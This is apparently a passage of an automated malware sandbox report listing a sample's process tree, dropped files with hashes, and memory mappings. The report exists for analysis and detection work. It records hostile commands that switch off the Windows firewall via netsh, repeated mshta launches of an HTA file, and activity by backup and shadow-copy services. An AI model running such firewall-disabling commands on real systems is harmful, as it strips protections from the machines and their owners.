C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=disable3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\bpevytwo.exeFilesize
32KB
MD5e9188c70264736a76f06ba4eeb65450e
SHA141bcf82bdba8869b9f2e91342fdabe8d2fea3676
SHA256a0e2ddc1779a6bb57d89ceddf801dce8b2da7a2f358bd930599a3d0eea56f8f1
SHA512f797cb43c0fd600260a8c213f607adb7b007fc8fa0f6a10e8e3d2b7b47e08c94565f7fac5235de11171d5c825de4a400127c50ae6aed96fb62a87b99451aad24
-
C:\Users\Admin\AppData\Local\Temp\RES351A.tmpFilesize
29KB
MD5f4e28a2f83eb9bfd345a6fc0b13fba8a
SHA1eaf422751390e195b975f51733933c2581575835
SHA256b6b2547ced9bb57b4161a53b13b4e76e90c51b75fea947db33954c25783e7ca4
SHA5127e9a71c0fd64018b6523bc848a61e01ee0aae032d692437b2663a5cdaad8d13fdd8f5dffc1fe549c7abf486a0e70fe5edca465a1cc789542da0aca65d9096a51
-
C:\Users\Admin\AppData\Local\Temp\info.htaFilesize
3KB
MD59ebf1767397b1ba0ed619373e6f352a9
SHA149b1230c50ae1ce41ef6ca6ffde5fbd24f0adc6b
SHA256c861dbec6608bbf7aa0c48efd05c62a2381a443711fc083d61cbdc47a9bbeba6
SHA51263648ef000db4eddfbfa20b7238cd826e16b413315ffa26c016ed45b3272b617d0e50258b368ce2b862cd0ea19fd639883f2899c7ee6230f6ae89b7b0137ddec
-
\??\c:\ProgramData\CSC92A2AE7CFC0E4AAB9B11A0211339996E.TMPFilesize
28KB
MD5e2578536dd0ffd022484bf61eef378cf
SHA1882dd4514a22ee2d74ba31d1e7e3c638be793d62
SHA2561b2db80ff3a55017171f8a8b9940a17cf57733e22fbe0d9e0d4cdb7354e2b64a
SHA5124d48497feaeabfc1ce59e1fdc6468af99024bda2f2dcd4fe2b16a4e3e0d5b5b3bfe7075f6b2af068d984b1015cc3d3ede4dacfcd2ab243b2950d4287c651f746
-
\??\c:\Users\Admin\AppData\Local\Temp\xgne5xiv.icoFilesize
27KB
MD5dbc49b5f7714255217080c2e81f05a99
SHA14de2ef415d66d2bb8b389ba140a468b125388e19
SHA2566d2f1f6164cbd331b9dc43b37948372e21b2ee45407aa99e199693835cded09c
SHA51229a65eb7403bfc220fd057c2e6ea11b29bff545dfce2d3370ad462c66b03ae7f648efd480305423a49440de199a2a94c41214877b226a42dc2d1650683d149bb
-
\??\c:\Users\Admin\AppData\Local\Temp\yoikjizn\yoikjizn.0.csFilesize
1KB
MD518f905f0497ac3516d54dc291e8ca7b4
SHA1195999b3b12ca396a49adcdad86e0982c929d8d2
SHA256b76378c370475262a7acd44f5257a1e06b7b8d198c1a5810c2918a7f1f8d6477
SHA512f91a2d053934762e852082fc51be523839f17922525f28f2bbdd5bde94d8f00621b1cca231d164216ce24b1b334ffc8fee4f0ab02d50b435ff25009f1e5f5cc9
-
\??\c:\Users\Admin\AppData\Local\Temp\yoikjizn\yoikjizn.cmdlineFilesize
236B
MD57a66a3d786ff3f14792983ec02e8ca6d
SHA189dfc7e6803d27970dbef55e034751644194435d
SHA256e20c239635a317e3262579dc65351817ef70b0ed5fb1f0e4a1f00a444769ec3b
SHA512f81851516d6ff8a4db32926ffc93c40bd42972eb6766419d4f308d5e024731bd97f30fa6b57e0a45f46ef6eccfb78482d7c042a3d6363917a86407510f9ad6c1
-
memory/292-162-0x0000000000000000-mapping.dmp
-
memory/516-149-0x0000000000000000-mapping.dmp
-
memory/532-143-0x0000000000000000-mapping.dmp
-
memory/616-145-0x0000000000000000-mapping.dmp
-
memory/904-147-0x0000000000000000-mapping.dmp
-
memory/1180-148-0x0000000000000000-mapping.dmp
-
memory/1388-146-0x0000000000000000-mapping.dmp
-
memory/1816-152-0x0000000000000000-mapping.dmp
-
memory/2024-134-0x0000000000000000-mapping.dmp
-
memory/2588-150-0x0000000000000000-mapping.dmp
-
memory/2736-131-0x00000000033B0000-0x0000000003426000-memory.dmpFilesize
472KB
-
memory/2736-130-0x0000000000840000-0x00000000008C2000-memory.dmpFilesize
520KB
-
memory/2736-132-0x00007FFE537D0000-0x00007FFE54291000-memory.dmpFilesize
10.8MB
-
memory/2740-151-0x0000000000000000-mapping.dmp
-
memory/2812-144-0x0000000000000000-mapping.dmp
-
memory/3048-160-0x0000000000000000-mapping.dmp
-
memory/3100-133-0x0000000000000000-mapping.dmp
-
memory/3276-157-0x0000000000000000-mapping.dmp
-
memory/3900-156-0x0000000000000000-mapping.dmp
-
memory/4368-153-0x0000000000000000-mapping.dmp
-
memory/4384-163-0x0000000000000000-mapping.dmp
-
memory/4416-154-0x0000000000000000-mapping.dmp
-
memory/4484-158-0x0000000000000000-mapping.dmp
-
memory/4688-159-0x0000000000000000-mapping.dmp
-
memory/4772-155-0x0000000000000000-mapping.dmp
-
memory/4920-161-0x0000000000000000-mapping.dmp
-
memory/4996-139-0x0000000000000000-mapping.dmp
-
memory/5008-135-0x0000000000000000-mapping.dmp